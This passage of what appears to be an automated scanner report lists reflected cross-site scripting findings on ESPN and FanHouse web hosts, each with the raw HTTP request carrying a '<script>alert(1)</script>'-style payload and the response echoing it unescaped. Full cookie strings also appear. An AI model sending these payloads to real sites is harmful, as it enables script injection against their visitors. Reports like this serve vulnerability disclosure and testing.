s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: maxage=0
Connection: close
Content-Length: 17807
Content-Type: text/html; charset=iso-8859-1
Pragma: no-cache
X-UA-Compatible: IE=EmulateIE7
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <script type="text/javascript" lang ...[SNIP]... <h2>/pokerpickem/en/endd1f8<script>alert(1)</script>3870a2a6f26/frontpage</h2> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload cad91<script>alert(1)</script>aea9d8a4290 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pokerpickem/en/frontpagecad91<script>alert(1)</script>aea9d8a4290 HTTP/1.1
Host: games.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 200 OK
Cache-Control: maxage=0
Connection: close
Content-Length: 17804
Content-Type: text/html; charset=iso-8859-1
Pragma: no-cache
X-UA-Compatible: IE=EmulateIE7
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <script type="text/javascript" lang ...[SNIP]... <h2>/pokerpickem/en/frontpagecad91<script>alert(1)</script>aea9d8a4290</h2> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a748f<script>alert(1)</script>f8c10452a72 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /pokerpickem/ena748f<script>alert(1)</script>f8c10452a72/group HTTP/1.1
Host: games.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: maxage=0
Connection: close
Content-Length: 17803
Content-Type: text/html; charset=iso-8859-1
Pragma: no-cache
X-UA-Compatible: IE=EmulateIE7
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <script type="text/javascript" lang ...[SNIP]... <h2>/pokerpickem/en/ena748f<script>alert(1)</script>f8c10452a72/group</h2> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d225d<script>alert(1)</script>ba2a1fa4d8d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pokerpickem/en/groupd225d<script>alert(1)</script>ba2a1fa4d8d HTTP/1.1
Host: games.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 200 OK
Cache-Control: maxage=0
Connection: close
Content-Length: 17800
Content-Type: text/html; charset=iso-8859-1
Pragma: no-cache
X-UA-Compatible: IE=EmulateIE7
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <script type="text/javascript" lang ...[SNIP]... <h2>/pokerpickem/en/groupd225d<script>alert(1)</script>ba2a1fa4d8d</h2> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 60154<script>alert(1)</script>a8449528d68 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /pokerpickem/en60154<script>alert(1)</script>a8449528d68/story HTTP/1.1
Host: games.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: maxage=0
Connection: close
Content-Length: 17803
Content-Type: text/html; charset=iso-8859-1
Pragma: no-cache
X-UA-Compatible: IE=EmulateIE7
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <script type="text/javascript" lang ...[SNIP]... <h2>/pokerpickem/en/en60154<script>alert(1)</script>a8449528d68/story</h2> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 98bbc<script>alert(1)</script>d41001c2763 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pokerpickem/en/story98bbc<script>alert(1)</script>d41001c2763 HTTP/1.1
Host: games.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A11%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Ftravel%2Fstadium%2FstadiumIndex%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A13%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009690554; s_sess=%20s_ppv%3D99%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289009651247; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009690492%7C1383617690492%3B%20s_c24_s%3DFirst%2520Visit%7C1289011490492%3B%20s_gpv_pn%3Dfantasy%253Apoker%253Apokerpickem%253Afrontpage%7C1289011490524%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 200 OK
Cache-Control: maxage=0
Connection: close
Content-Length: 17800
Content-Type: text/html; charset=iso-8859-1
Pragma: no-cache
X-UA-Compatible: IE=EmulateIE7
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <script type="text/javascript" lang ...[SNIP]... <h2>/pokerpickem/en/story98bbc<script>alert(1)</script>d41001c2763</h2> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1a591<script>alert(1)</script>4469738f57 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /insider/blog1a591<script>alert(1)</script>4469738f57 HTTP/1.1
Host: insider.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Connection: close
Content-Length: 133
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
Via: 8810-05/06
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/insider/blog1a591<script>alert(1)</script>4469738f57</BODY></HTML>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f2f55<script>alert(1)</script>52656a339f6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /insider/indexf2f55<script>alert(1)</script>52656a339f6 HTTP/1.1
Host: insider.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Connection: close
Content-Length: 135
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
Via: 8810-05/06
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/insider/indexf2f55<script>alert(1)</script>52656a339f6</BODY></HTML>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d0146<script>alert(1)</script>35faeff8fe6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /insider/newsd0146<script>alert(1)</script>35faeff8fe6 HTTP/1.1
Host: insider.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Connection: close
Content-Length: 134
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
Via: 8810-05/06
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/insider/newsd0146<script>alert(1)</script>35faeff8fe6</BODY></HTML>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 941a2<script>alert(1)</script>9a411c627fc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /insider/rumorcentral941a2<script>alert(1)</script>9a411c627fc HTTP/1.1
Host: insider.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Connection: close
Content-Length: 142
Content-Type: text/html; charset=iso-8859-1
Server: barista/3.3.6
Via: 8810-05/06
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/insider/rumorcentral941a2<script>alert(1)</script>9a411c627fc</BODY></HTML>
2.37. http://insider.espn.go.com/insider/rumorcentral [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://insider.espn.go.com
Path: /insider/rumorcentral
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eba35"><script>alert(1)</script>2279e161389 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /insider/rumorcentral?eba35"><script>alert(1)</script>2279e161389=1 HTTP/1.1 Host: insider.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload dfccc<script>alert(1)</script>5419d7c4d6a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /insider/sportindexdfccc<script>alert(1)</script>5419d7c4d6a HTTP/1.1 Host: insider.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 140 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 Via: 8810-05/06
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/insider/sportindexdfccc<script>alert(1)</script>5419d7c4d6a</BODY></HTML>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3b753<script>alert(1)</script>9c552fecda5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /soccer3b753<script>alert(1)</script>9c552fecda5/ HTTP/1.1 Host: m.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 129 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/soccer3b753<script>alert(1)</script>9c552fecda5/</BODY></HTML>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 57344<script>alert(1)</script>4ba2aaa9554 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wireless57344<script>alert(1)</script>4ba2aaa9554/ HTTP/1.1 Host: m.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 131 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/wireless57344<script>alert(1)</script>4ba2aaa9554/</BODY></HTML>
2.41. http://ncaafootball.fanhouse.com/2010/11/06/joe-paterno-wins-400th-game/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ncaafootball.fanhouse.com
Path: /2010/11/06/joe-paterno-wins-400th-game/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3850"-alert(1)-"30dea48b6b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2010/11/06/joe-paterno-wins-400th-game/?b3850"-alert(1)-"30dea48b6b2=1 HTTP/1.1 Host: ncaafootball.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
var s_code=s_265.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
2.42. http://ncaafootball.fanhouse.com/2010/11/06/joe-paterno-wins-400th-game/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ncaafootball.fanhouse.com
Path: /2010/11/06/joe-paterno-wins-400th-game/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 195fb"><script>alert(1)</script>26925aa0a54 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/11/06/joe-paterno-wins-400th-game/?195fb"><script>alert(1)</script>26925aa0a54=1 HTTP/1.1 Host: ncaafootball.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 58f10<script>alert(1)</script>c39bdb4f674 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /outdoors/bassmaster/members58f10<script>alert(1)</script>c39bdb4f674/insider/resources/column HTTP/1.1 Host: proxy.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; s_sess=%20s_v3%3D2010_nbati_xxx_xxx_xxx_xxx%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D94%3B; CRBLM_LAST_UPDATE=1289009493; ESPN360beta=betaSet; userAB=7; lang=en; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009663777%7C1383617663777%3B%20s_c24_s%3DFirst%2520Visit%7C1289011463777%3B%20s_gpv_pn%3Despn%253Ancf%253Aindex%7C1289011463789%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 174 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CAO DSP CURi ADM DEV TAIi PSA PSD IVAi IVDi CONi OUR DELi SAMi BUS PHY ONL UNI COM NAV DEM CNT STA PRE Pool: pool-ESPN_proxy_bassmaster Via: 8810-09/10
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/outdoors/bassmaster/members58f10<script>alert(1)</script>c39bdb4f674/insider/resources/column</BODY></HTML>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 633a0<script>alert(1)</script>c2ca6d34533 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /outdoors/bassmaster/members633a0<script>alert(1)</script>c2ca6d34533/insider/story HTTP/1.1 Host: proxy.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; s_sess=%20s_v3%3D2010_nbati_xxx_xxx_xxx_xxx%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D94%3B; CRBLM_LAST_UPDATE=1289009493; ESPN360beta=betaSet; userAB=7; lang=en; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009663777%7C1383617663777%3B%20s_c24_s%3DFirst%2520Visit%7C1289011463777%3B%20s_gpv_pn%3Despn%253Ancf%253Aindex%7C1289011463789%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 163 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CAO DSP CURi ADM DEV TAIi PSA PSD IVAi IVDi CONi OUR DELi SAMi BUS PHY ONL UNI COM NAV DEM CNT STA PRE Pool: pool-ESPN_proxy_bassmaster Via: 8810-09/10
